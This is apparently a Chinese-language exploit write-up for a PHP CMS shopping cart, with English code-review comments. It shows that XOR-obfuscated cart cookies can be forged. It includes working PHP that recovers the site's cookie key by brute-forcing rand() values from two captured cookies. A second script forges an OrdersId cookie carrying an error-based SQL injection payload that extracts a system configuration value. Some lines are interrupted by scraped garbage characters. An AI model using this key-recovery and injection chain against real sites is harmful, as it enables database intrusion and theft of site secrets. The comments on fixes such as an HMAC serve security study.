www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中
先看一下 shopcar 类是如何生成并“加密”购物车 cookie 的：
// include/shopcar.class.php, lines 239-250 (quoted as found in the vulnerable build).
// Writes one cart cookie. Array values are first flattened by enCode() — the
// surrounding text describes it as array -> "a=b&c=d", it is not shown here —
// and then passed through enCrypt(); scalar values go straight to enCrypt().
// NOTE(review): enCrypt()/setKey() below only XOR the value with a per-cookie
// rand()-derived key and a fixed site key. There is no integrity tag, so the
// server cannot distinguish a forged cookie from a genuine one. The real fix is
// an HMAC over the value with a server-side secret, checked on the read side
// (getCookie(), not on this page) — not a change confined to this method.
function saveCookie($key,$value)
{
    if(is_array($value))
    {
        $value = $this->enCrypt($this->enCode($value));
    }
    else
    {
        $value = $this->enCrypt($value);
    }
    // 10-hour lifetime, site-wide path. No HttpOnly/Secure flags are passed here.
    setcookie($key,$value,time()+36000,'/');
}
简单地说，$key 就是 cookie 的名字，$value 就是值；enCode 的作用是把数组转成 a=yy&b=cc&d=know 这样的查询串。关键在 enCrypt 函数：
// include/shopcar.class.php, lines 186-198. "Encrypts" a cookie value.
// Layout of $tmp: for every plaintext byte i the key byte used
// (k = $encrypt_key[i % 32]) is written first, then (txt[i] ^ k). The output
// therefore carries its own per-cookie key in the clear; the only further
// protection is the second XOR layer applied by setKey().
// NOTE(review): weaknesses visible in this function
//  - the per-cookie key is md5(rand(0, 32000)) with srand() seeded from
//    microtime(): at most 32001 distinct keys (0..32000 inclusive), so one
//    known plaintext/cookie pair lets an attacker enumerate them all;
//  - both layers are keystream-only XOR with no MAC, so cookie values are
//    malleable — widening rand()'s range alone would not make forgery impossible;
//  - rand()/srand() are not cryptographic; random_bytes() for any nonce and an
//    HMAC over the value are the appropriate primitives.
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));   // 32 lowercase hex chars
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;   // wrap key index every 32 bytes
        // key byte in the clear, followed by the plaintext byte XORed with it
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode($this->setKey($tmp));
}
// include/shopcar.class.php, lines 213-225. Second layer: XOR $txt with the
// fixed site-wide key md5(strtolower($cfg_cookie_encode)), repeating every
// 32 bytes. XOR is its own inverse, so the same routine presumably undoes it
// on the read side (the decrypt path is not shown on this page).
// NOTE(review): a repeating-key XOR leaks its key under known plaintext:
// key[i] = ciphertext[i] ^ plaintext[i] for the first 32 bytes, which is
// exactly what the recovery script further down computes for each candidate
// enCrypt() key. strtolower() also shrinks the secret's effective alphabet
// before hashing.
function setKey($txt)
{
    global $cfg_cookie_encode;
    $encrypt_key = md5(strtolower($cfg_cookie_encode));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;   // wrap at 32
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
enCrypt 的参数 $txt（购物车内容）我们是可知的，返回值就是 cookie 的值，这个我们也是可知的。
然后看 enCrypt 调用 setKey 时的参数 $tmp。这个参数在某种意义上我们也是可知的：因为 $encrypt_key = md5(rand(0, 32000)) 只有 32001 种可能（0 到 32000，含两端），而 $tmp 中每个明文字节前面都原样存放了所用的 key 字符，所以可以推出 32001 种可能的 $tmp，再与 cookie 异或就得到 32001 种可能的 md5(strtolower($cfg_cookie_encode))。忘了说，我们的目的是推出 setKey 中 $encrypt_key 的值，有了它才能任意构造购物车 cookie。由于 md5 的结果只含 [0-9a-f]，过滤掉不符合这一格式的候选后只剩下几百个；再下一次订单拿到第二个 cookie，同样得到几百个候选，两者取交集即得最终 key。
具体代码如下:
" Y% `: x! v9 x8 J M8 l; l A0 z<?php1 i& u$ P( {2 H6 m$ M
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
9 ^' u3 Q' H# |5 o& g' E1 z3 d$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
0 y3 @- H2 B; J: O$ Z$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
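// Recover the 32-byte setKey() key for one guess: XOR the first 32 bytes of the
// candidate pre-setKey buffer ($string, rebuilt for a single rand() value) with
// the first 32 bytes of the base64-decoded cookie ($code). setKey() is a plain
// repeating-key XOR, so ciphertext[i] ^ plaintext[i] == key[i % 32].
//
// Fix vs. original: the original read 32 offsets unconditionally, emitting
// "Uninitialized string offset" warnings and a silently truncated key when
// either input was shorter than 32 bytes, and it ignored base64 failures.
//
// @param string $code   base64-encoded cookie value
// @param string $string candidate buffer (key byte, XORed byte, key byte, ...)
// @return string up to 32 recovered key bytes; "" if $code is not valid base64
function reStrCode($code,$string)
{
    $code = base64_decode($code, true);   // strict: reject non-base64 input
    if ($code === false) {
        return "";
    }
    $n = min(32, strlen($code), strlen($string));
    $key = "";
    for ($i = 0; $i < $n; $i++) {
        $key .= $string[$i] ^ $code[$i];
    }
    return $key;
}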
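// Brute-force every value rand(0, 32000) can return, rebuild the start of the
// buffer enCrypt() would have produced for the known plaintext, and XOR it with
// the decoded cookie. For the right guess the result is exactly
// md5(strtolower($cfg_cookie_encode)); wrong guesses mostly yield non-hex bytes
// and are dropped. Candidates are echoed as found and returned.
//
// Fixes vs. original: the loop bound was `< 32000`, skipping 32000, which
// rand(0, 32000) can return; eregi() was removed in PHP 7 (preg_match() now);
// the filter requires the exact md5 shape (32 lowercase hex chars) rather than
// any run of alphanumerics, which discards most false candidates; the cookie is
// decoded once instead of once per guess; the dead `$tmp = $cookie` is gone.
//
// @param string $cookie  base64 cart cookie captured from the browser
// @param string $plantxt plaintext enCode() produced for it; at least 16 bytes
//                        are needed so that 32 bytes of buffer exist
// @return string[] candidate site keys (32 hex chars each), possibly empty
function getKeys($cookie,$plantxt)
{
    $cipher = base64_decode($cookie, true);
    if ($cipher === false || strlen($cipher) < 32 || strlen($plantxt) < 16) {
        return array();   // not enough material to recover a full 32-byte key
    }
    $head = substr($cipher, 0, 32);
    $results = array();
    for ($j = 0; $j <= 32000; $j++)   // rand(0, 32000) is inclusive at both ends
    {
        $encrypt_key = md5((string)$j);   // candidate per-cookie key, 32 hex chars
        // First 32 bytes of enCrypt()'s buffer: 16 plaintext bytes, each
        // preceded by the key byte XORed into it (key index never wraps here).
        $buf = '';
        for ($i = 0; $i < 16; $i++) {
            $buf .= $encrypt_key[$i] . ($plantxt[$i] ^ $encrypt_key[$i]);
        }
        // setKey() is a repeating XOR, so cipher ^ buffer yields the site key.
        $candidate = $head ^ $buf;
        if (preg_match('/^[0-9a-f]{32}$/', $candidate))
        {
            echo $candidate . "\n";
            $results[] = $candidate;
        }
    }
    return $results;
}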
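// Run the recovery against both captured cookies and keep only the candidates
// common to both: a wrong rand() guess produces a different false candidate for
// each cookie, so the intersection is (almost always) just the real key.
// Fix vs. original: the O(n*m) nested loops are replaced by array_intersect(),
// duplicates are collapsed so each key prints once, and an empty intersection
// is reported instead of printing nothing.
$results1 = getKeys($cookie1,$plantxt);
$results2 = getKeys($cookie2,$plantxt);
print "\n——————–real key————————–\n";
$common = array_unique(array_intersect($results1, $results2));
if (count($common) === 0) {
    print "no common key - check \$plantxt against the real enCode() output\n";
}
foreach ($common as $realKey) {
    echo $realKey . "\n";
}
?>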
cookie1 和 cookie2 是我下了两次订单后分别生成的 cookie；
plantxt 可以根据页面自己推算，大概就是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1
然后就能推算出 md5(strtolower($cfg_cookie_encode))。
得到这个 key 之后，我们就可以构造任意购物车的 cookie。（根本原因在于 cookie 只做了异或混淆而没有任何完整性校验，服务端无法区分伪造值；修复应当用服务端密钥对 cookie 做 HMAC 并在读取时校验，仅仅扩大 rand() 的取值范围并不能解决问题。）
接着看 MemberShops 类的构造函数：
20 class MemberShops
0 g, V/ E: i; G7 l A9 W8 M, ~ |! c21 {
, e, e l6 F \* [22 var $OrdersId;0 }: U1 ^+ F$ K% W4 R7 Y a
23 var $productsId;
- D. j. ^4 r6 n V2 H( F# j241 Q* p2 G3 M5 Z5 k
// include/shopcar.class.php, lines 25-32 (MemberShops constructor).
// The current order id is read straight from the "OrdersId" cookie; only when
// that cookie is absent or empty is a fresh id minted. NOTE(review): getCookie()
// is not shown here, but given the enCrypt()/setKey() scheme above it can only
// XOR-decode, not authenticate, so $this->OrdersId is attacker-controlled for
// anyone able to forge a cookie, and it is later interpolated into SQL in
// plus/carbuyaction.php. The fix belongs in getCookie() (reject values without a
// valid MAC) and here: validate the decoded id against the format MakeOrders()
// produces before trusting it — TODO confirm that format, it is not on this page.
function __construct()
{
    $this->OrdersId = $this->getCookie("OrdersId");
    if(empty($this->OrdersId))
    {
        $this->OrdersId = $this->MakeOrders();   // no cookie yet: mint a new order id
    }
}
发现 OrdersId 是直接从 cookie 里取出来的，而上面的“加密”并不能阻止伪造。
然后看 /plus/carbuyaction.php 中的：
// plus/carbuyaction.php, lines 29 and 39: the order id used for this request
// comes from MemberShops::__construct(), i.e. from the client's cookie.
$cart = new MemberShops();
$OrdersId = $cart->OrdersId; // order id recorded for this request (cookie-derived)
……
// plus/carbuyaction.php, line 173. $OrdersId is concatenated into the query
// string, so with a forged cookie this is a SQL injection sink. Fix: the CMS's
// quoting helper is not visible here, but the value must be whitelisted to the
// characters MakeOrders() emits (or bound as a parameter) before reaching $dsql.
$rows = $dsql->GetOne("SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1");
$OrdersId 被直接拼进了 SQL 语句，接着我们就可以注入了。
通过下面的代码生成 cookie（其中 $encrypt_key 换成上一步推出的 key）：
<?php
// --- Inputs ------------------------------------------------------------------
// $txt is the value that will land in MemberShops::$OrdersId and from there in
// the carbuyaction.php query. $encrypt_key is md5(strtolower($cfg_cookie_encode))
// as recovered by the script above; substitute the key you obtained.
$txt = "1' or 1=@`\'` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\'` or '1'='1";
$encrypt_key = "9f09293b7419ed68448fb51d5b174834";   // recovered site key - change here
// Local copy of shopcar.class.php's setKey(): repeating-key XOR of $txt with the
// recovered 32-char site key held in the global $encrypt_key (the CMS derives
// it from md5(strtolower($cfg_cookie_encode)) instead).
function setKey($txt)
{
    global $encrypt_key;
    $keyLen = strlen($encrypt_key);
    $n = strlen($txt);
    $out = '';
    for ($pos = 0, $k = 0; $pos < $n; $pos++, $k++) {
        if ($k == $keyLen) {
            $k = 0;   // wrap the key index
        }
        $out .= $txt[$pos] ^ $encrypt_key[$k];
    }
    return $out;
}
// Local copy of shopcar.class.php's enCrypt(): picks a throw-away per-cookie key
// exactly as the CMS does (md5 of rand(0, 32000)), interleaves key byte and
// XORed plaintext byte, then applies setKey() and base64. The per-cookie key is
// carried inside the output, so presumably any value would decode on the server
// (the decrypt path is not on this page); rand() is kept only so the forged
// cookie resembles a genuine one.
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);
    $cookieKey = md5(rand(0, 32000));
    $keyLen = strlen($cookieKey);
    $n = strlen($txt);
    $buf = '';
    for ($pos = 0, $k = 0; $pos < $n; $pos++, $k++) {
        if ($k == $keyLen) {
            $k = 0;   // wrap the key index
        }
        // key byte in the clear, then the plaintext byte XORed with it
        $buf .= $cookieKey[$k] . ($txt[$pos] ^ $cookieKey[$k]);
    }
    return base64_encode(setKey($buf));
}
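// Produce the forged cookie, re-rolling the random per-cookie key until the
// base64 output contains no '+'. Presumably this is because PHP's cookie
// parsing turns '+' into a space in $_COOKIE, which would corrupt the value
// server-side — not shown on this page, verify against the target.
//
// Fix vs. original: `if(!strpos($dest,'+'))` treated a '+' at offset 0 as
// "not found" (strpos() returns 0, which is falsy) and accepted a bad cookie;
// the check is now `=== false`. The loop is also bounded so a persistent '+'
// cannot spin forever.
$maxAttempts = 100000;
$dest = null;
for ($attempt = 0; $attempt < $maxAttempts; $attempt++) {
    $candidate = enCrypt($txt);
    if (strpos($candidate, '+') === false) {
        $dest = $candidate;
        break;
    }
}
if ($dest === null) {
    fwrite(STDERR, "could not produce a '+'-free cookie after $maxAttempts attempts\n");
    exit(1);
}
echo $dest."\n";
?>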